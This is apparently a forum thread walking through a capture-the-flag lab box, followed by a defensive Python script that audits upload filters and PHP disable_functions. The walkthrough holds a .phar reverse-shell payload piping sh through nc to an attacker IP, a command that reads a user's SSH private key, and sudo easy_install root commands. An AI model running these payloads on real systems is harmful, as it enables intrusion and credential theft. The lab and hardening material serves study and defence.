Posts: 213 Threads: 0 Joined: N/A September 3, 2022 at 7:02 PM
New machine from 2022-09-03.
[code]PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 9e:1f:98:d7:c8:ba:61:db:f1:49:66:9d:70:17:02:e7 (RSA)
|   256 c2:1c:fe:11:52:e3:d7:e5:f7:59:18:6b:68:45:3f:62 (ECDSA)
|_  256 5f:6e:12:67:0a:66:e8:e2:b7:61:be:c4:14:3a:d3:8e (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Is my Website up ?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel[/code]
Posts: 213 Threads: 0 Joined: N/A September 3, 2022 at 7:38 PM
http://dev.siteisup.htb/ exists.
I'm trying to check this website using Debug mode.

Posts: 22 Threads: 0 Joined: N/A September 3, 2022 at 7:45 PM
http://siteisup.htb/dev/.git/ is repo for http://dev.siteisup.htb

Posts: 24 Threads: 0 Joined: N/A September 3, 2022 at 7:45 PM
Git is open on http://siteisup.htb/dev/

Posts: 213 Threads: 0 Joined: N/A September 3, 2022 at 7:55 PM
So I downloaded the .git directory and ran git diff.
We need to add the header "Special-Dev: only4dev" in order to view http://dev.siteisup.htb/

Posts: 21 Threads: 0 Joined: N/A September 3, 2022 at 8:40 PM
(September 3, 2022, 07:45 PM)technic Wrote: http://siteisup.htb/dev/.git/ is repo for http://dev.siteisup.htb
How did you find out? I can't access http://siteisup.htb/dev

Posts: 21 Threads: 0 Joined: N/A September 3, 2022 at 8:51 PM
(September 3, 2022, 08:20 PM)Hacker2222 Wrote: file upload gets uploaded in /uploads/ with directory traversal. filtered on extensions but not .phar. can add php code at bottom, but has blocked functions. file gets deleted when every line is checked, can put in a long list to get execution though
Struggling with Burp to get a reverse shell to bite? Perhaps LFI is the key here? For SSH - just guessing! Any movement? Uploads directories empty?

Posts: 19 Threads: 0 Joined: N/A September 3, 2022 at 9:31 PM
(September 3, 2022, 08:40 PM)voidx01 Wrote: (September 3, 2022, 07:45 PM)technic Wrote: http://siteisup.htb/dev/.git/ is repo for http://dev.siteisup.htb How did you find out? I can't access http://siteisup.htb/dev
[code]wget -r http://siteisup.htb/dev/.git[/code]

Posts: 74 Threads: 0 Joined: N/A September 3, 2022 at 11:17 PM
Here is how to root the box:
First find the git repo on the webapp and the vhost.
Dump the git repo using something like git-dumper.
In the source code of the git repo, check the checker.php file; you will see that you are able to upload files and .phar is not included in the upload filter.
Also from .htaccess, you will see that you need a header like this to access dev.siteisup.htb (you can use Burp and just create a rule):
[code]Special-Dev: only4dev[/code]
So create a .phar file, and put like 200 to 300 lines of random URLs in it to gain some time, because after it checks the URLs the file gets deleted.
Using this you are able to run some commands, but there are some disabled functions that prevent us from running system commands.
You can use file_put_contents to put <?php phpinfo(); ?> into a php file on the webapp and see what those functions are.
The proc_open function is not one of those disabled functions, so after the URLs put this (modifying the IP and port) and upload the phar file:
[code]<?php
$descriptorspec = array(
    0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
    1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
    2 => array("file", "/tmp/error-output.txt", "a") // stderr is a file to write to
);
$process = proc_open("sh", $descriptorspec, $pipes);
if (is_resource($process)) {
    // $pipes now looks like this:
    // 0 => writeable handle connected to child stdin
    // 1 => readable handle connected to child stdout
    // Any error output will be appended to /tmp/error-output.txt
    fwrite($pipes[0], "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc IP PORT >/tmp/f");
    fclose($pipes[0]);
    while (!feof($pipes[1])) {
        echo fgets($pipes[1], 1024);
    }
    fclose($pipes[1]);
    // It is important that you close any pipes before calling
    // proc_close in order to avoid a deadlock
    $return_value = proc_close($process);
    echo "command returned $return_value";
}
?>[/code]
And then you can just make a GET request to the phar file with a command like this without too much bother:
[code]curl -H 'Special-Dev: only4dev' -s http://dev.siteisup.htb/uploads/ | grep "\[DIR\]" | cut -d "\"" -f 8 > folder-names; while read -r line; do curl -v -H 'Special-Dev: only4dev' "http://dev.siteisup.htb/uploads/${line}<PHAR-FILE-NAME>.phar"; done < folder-names[/code]
You should be able to get a shell with this.
For www-data to user:
The /home/developer/dev/siteisup binary has the SUID bit set for the developer user.
Running strings on it, or just running it, it is clear that it just runs the python script with SUID privileges.
We can inject commands and get the user's SSH key by simply inputting something like:
[code]__import__('os').system('cat /home/developer/.ssh/id_rsa')[/code]
After logging in with the SSH key you got, checking sudo you will see this:
[code]Matching Defaults entries for developer on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User developer may run the following commands on localhost:
    (ALL) NOPASSWD: /usr/local/bin/easy_install[/code]
You can get root by running these commands from [url=https://gtfobins.github.io/gtfobins/easy_install/#sudo]GTFOBins[/url]:
[code]TF=$(mktemp -d)
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
sudo easy_install $TF[/code]

Posts: 18 Threads: 0 Joined: N/A September 4, 2022 at 1:57 AM
(September 3, 2022, 11:17 PM)11231123 Wrote: Here is how to root the box:
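The two server-side gaps the walkthrough above depends on (an upload filter that blocks PHP extensions but not .phar, and a disable_functions list that leaves proc_open usable) can be checked mechanically. The following is an added example written for this page, not code from any post in the thread or from the box. The blocklist and the disable_functions string are constructed assumptions, not the real checker.php or php.ini from the machine. The Apache handler pattern is the one Ubuntu's libapache2-mod-php ships in its php*.conf, which is why a file ending in .phar is executed as PHP at all.

```python
"""Audit an upload-extension filter against Apache's PHP handler pattern,
and a php.ini disable_functions value against the process-spawning
functions that must be in it."""
import re

# Handler pattern from Ubuntu's /etc/apache2/mods-available/php*.conf:
# .php, .phtml and .phar are all handed to the PHP engine, so a blocklist
# that stops at .php/.phtml is incomplete.
APACHE_PHP_HANDLER = re.compile(r".+\.ph(ar|p|tml)$")

# Constructed blocklist for illustration (assumption, not the box's real
# checker.php list).
ASSUMED_BLOCKLIST = {"php", "php3", "php4", "php5", "phtml"}

# Hardened alternative: allow only the type the feature actually needs.
ALLOWLIST = {"txt"}

# Functions that spawn a process or load native code; any one left out of
# disable_functions is a way back to a shell.
SPAWN_FUNCTIONS = ["system", "exec", "shell_exec", "passthru", "popen",
                   "proc_open", "pcntl_exec", "dl"]

# Constructed disable_functions value mirroring the walkthrough's finding
# (proc_open missing); not the machine's actual php.ini.
CONSTRUCTED_DISABLE_FUNCTIONS = (
    "system,exec,shell_exec,passthru,popen,pcntl_exec,dl")


def extension(filename: str) -> str:
    """Lower-cased text after the last dot of the base name, '' if none."""
    base = filename.rsplit("/", 1)[-1]
    return base.rsplit(".", 1)[1].lower() if "." in base else ""


def blocklist_allows(filename: str, blocklist=ASSUMED_BLOCKLIST) -> bool:
    """Decision of a blocklist-style filter (the weak pattern)."""
    return extension(filename) not in blocklist


def allowlist_allows(filename: str, allowlist=ALLOWLIST) -> bool:
    """Decision of an allowlist-style filter (the hardened pattern)."""
    return extension(filename) in allowlist


def apache_executes(filename: str) -> bool:
    """True if mod_php would run this file name as PHP."""
    base = filename.rsplit("/", 1)[-1]
    return APACHE_PHP_HANDLER.match(base) is not None


def filter_gaps(candidates, blocklist=ASSUMED_BLOCKLIST):
    """Names the blocklist accepts that Apache would still execute."""
    return [f for f in candidates
            if blocklist_allows(f, blocklist) and apache_executes(f)]


def parse_disable_functions(value: str):
    """Turn a php.ini disable_functions value into a set of names."""
    return {n.strip().lower() for n in value.split(",") if n.strip()}


def uncovered_spawn_functions(value: str):
    """Process-spawning functions the given disable_functions misses."""
    disabled = parse_disable_functions(value)
    return [f for f in SPAWN_FUNCTIONS if f not in disabled]


if __name__ == "__main__":
    names = ["shell.php", "shell.phtml", "shell.phar", "list.txt",
             "x.phar.txt"]
    print("blocklist accepts but Apache runs:", filter_gaps(names))
    print("allowlist accepts:", [n for n in names if allowlist_allows(n)])
    print("disable_functions misses:",
          uncovered_spawn_functions(CONSTRUCTED_DISABLE_FUNCTIONS))
```

Run against the constructed inputs it reports shell.phar as the only name that slips past the blocklist yet matches the handler, and proc_open as the only spawn function missing from disable_functions, which is exactly the pair of gaps the walkthrough chains. The allowlist check is the fix for the first gap; for defence in depth the uploads directory should also have PHP execution disabled at the web-server level, so that a filter mistake cannot become code execution.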